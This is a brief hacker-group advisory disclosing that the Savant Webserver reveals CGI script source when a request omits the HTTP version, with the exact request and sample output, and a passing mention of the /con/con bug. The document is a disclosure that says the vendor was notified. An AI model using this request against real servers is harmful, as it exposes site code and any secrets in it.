MDMA Advisory #5 by Andrew Lewis aka. Wizdumb Reading of CGI Scripts under Savant Webserver It is possible to view the source of CGI scripts running under the Savant Webserver by omitting the HTTP version from your request. For example, we connect to port 80 of the server and type "GET /cgi-bin/mdma.bat HTTP/1.0" followed by two enters, and the results are as follows... ------------------------------------------------ HTTP/1.0 200 OK Pragma: no-cache Content-type: text/html Server: Savant phjeeeer ------------------------------------------------ However, if we just type "GET /cgi-bin/mdma.bat" followed by two enters, the results are as follows... ------------------------------------------------ @echo off rem CGI Script for demonstrating vulnerability echo phjeeeer ------------------------------------------------ The vendor has been contacted and a fix is in the pipeline. Greetz to everyone in MDMA, b0f, Vortexia, Blabber.Net's #hack, and everyone that knows me. Cheers, Andrew Lewis aka. Wizdumb PS. Savant is also affected by the /con/con bug - as if you were expecting otherwise ;-) --==--==--==--==-->> wizdumb@leet.org www.mdma.za.net/fk